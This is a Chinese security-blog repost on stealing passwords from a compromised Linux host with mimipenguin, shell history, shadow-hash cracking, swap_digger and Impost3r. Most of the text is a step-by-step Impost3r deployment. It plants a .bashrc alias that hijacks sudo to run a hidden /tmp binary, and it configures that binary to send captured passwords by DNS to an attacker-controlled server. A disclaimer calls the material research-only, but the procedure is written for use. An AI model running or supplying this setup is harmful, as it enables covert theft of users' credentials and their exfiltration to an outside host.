linux下的凭据窃取

admin 2024年8月18日00:05:04评论15 views字数 2214阅读7分22秒阅读模式

本文仅用于技术研究学习,请遵守相关法律,禁止使用本文所提及的相关技术开展非法攻击行为,由于传播、利用本文所提供的信息而造成任何不良后果及损失,与本账号及作者无关。

关于无问社区

    无问社区致力于打造一个面向于网络安全从业人员的技术综合服务社区,可免费获取安全技术资料,社区可提供的技术资料覆盖全网,辅助学习的功能丰富。

    特色功能:划词解析、调取同类技术资料、AI助手全网智能检索(免费试用)、基于推荐算法,为每一位用户量身定制专属技术资料。

无问社区-官网:http://wwlib.cn

本文来源于无问社区,站内阅读链接:

http://wwlib.cn/index.php/artread/artid/11837.html

在获取到linxu系统权限后,通常需要通过获取系统中的密码来得到系统或服务的合法权限,本次分享几种获取密码的方法。

方法一:mimipenguin获取密码

项目地址:https://github.com/huntergregal/mimipenguin

linux下的凭据窃取

方法二:history历史命令查询

使用history命令查询历史命令中的密码信息,可以配合grep命令加快定位速度。

linux下的凭据窃取

方法三:Shadow密码文件破解

当hash的开头为$1时,可通过md5解密获取密码

linux下的凭据窃取

方法四:使用swap_digger破解系统密码

项目地址:https://github.com/sevagas/swap_digger

linux下的凭据窃取

方法五:使用Impost3r获取系统密码

项目地址:https://github.com/ph4ntonn/Impost3r

首先进入用户账户目录下,找到.bashrc文件,添加以下代码

alias sudo='impost3r() {
if [ -f "/tmp/.impost3r" ]; then
/tmp/.impost3r "$@" && unalias sudo
else
unalias sudo;sudo "$@"
fi
}; impost3r'

linux下的凭据窃取

箭头所指的位置需要跟,后续生成的.impost3r文件放置的位置相同。

然后运行

source ~/.bashrc

接下来将整个 https://github.com/ph4ntonn/Impost3r 项目上传到目标主机上,进入到sudo文件夹下,然后编辑 main.h

/*
Custom setting
*/
# define FILENAME "/tmp/.impost3r" 设置Impost3r在目标服务器上的位置
# define BACKUP_ORI_FILENAME ".bashrc" 表明攻击者所备份的源用户配置文件是.bashrc还是.bash_profile、.profile、.bash_login
# define BACKUP_ORI_PATH "/tmp/.bashrc" 表明攻击者所备份的源用户配置文件在目标服务器上的位置
# define SAVE_OR_SEND 0 设置在窃取成功后是将结果保存在目标机器上或者是发送至攻击者控制的机器(发送=0,保存=1,默认为发送)
/*
Send to server
*/
# define YOUR_DOMAIN ".com" 注意,如果你不想购买一个域名来接收Impost3r回传的消息且被植入Impost3r的目标服务器并未禁止向你所控制的dns服务器的53端口的直接udp连接,那么这里的域名请使用默认值;
但是如果被植入Impost3r的目标服务器严格限制了dns请求的出站,那么请将YOUR_DOMAIN的值改为你所购买的域名,例如“.example.com”,并将这个域名的NS记录配置成你所控制的DNS服务器地址,在此DNS服务器上运行Fdns,并将下方REMOTE_ADDRESS的值更改为被植入Impost3r的目标服务器的默认dns地址,REMOTE_PORT更改为被植入Impost3r的目标服务器的默认dns地址所监听的dns服务端口(绝大多数情况下都是53端口)
# define MAX_RESEND 30 设置当窃取到密码之后,Impost3r向攻击者服务器发送用户密码的最大重试次数
# define RESEND_INTERVAL 5 设置每一次发送密码的间隔
# define REMOTE_ADDRESS "192.168.0.12" 设置回送密码的远程地址
# define REMOTE_PORT 53 设置回送密码的远程端口
/*
Save to local
*/
# define SAVE_LOCATION "/tmp/.cache" 设置结果文件保存的位置,在SAVE_OR_SEND设置为1的情况下

这里我们关注下SAVE_OR_SEND选项,将其设置为 0 ,然后修改 REMOTE_ADDRESS 为自己的监听服务器,这里要注意,监听的服务器上面要开启 dns 服务,默认为 53 端口,无需修改。

FILENAME的路径需要跟上面图片里箭头的路径相同,本文都放在 /tmp/ 文件夹下。

linux下的凭据窃取

然后保存,之后运行make,接下来便会在当前目录生成 .impost3r

linux下的凭据窃取

将其复制到/tmp/目录下,等到目标账户用户进行 sudo 的时候,我们便可在监听服务器的 /var/mail 目录下获取到账户信息。

linux下的凭据窃取

多种方式利用Redis获取权限

为喜欢的游戏“排忧解难”之钓鱼网站

通过共享目录上传后门

图像隐写加载payload

安全社区与AI模型结合探索【文末申请免费试用资格】

linux下的凭据窃取

点“阅读原文”,访问无问社区

原文始发于微信公众号(白帽子社区团队):linux下的凭据窃取

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月18日00:05:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   linux下的凭据窃取https://cn-sec.com/archives/3075832.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息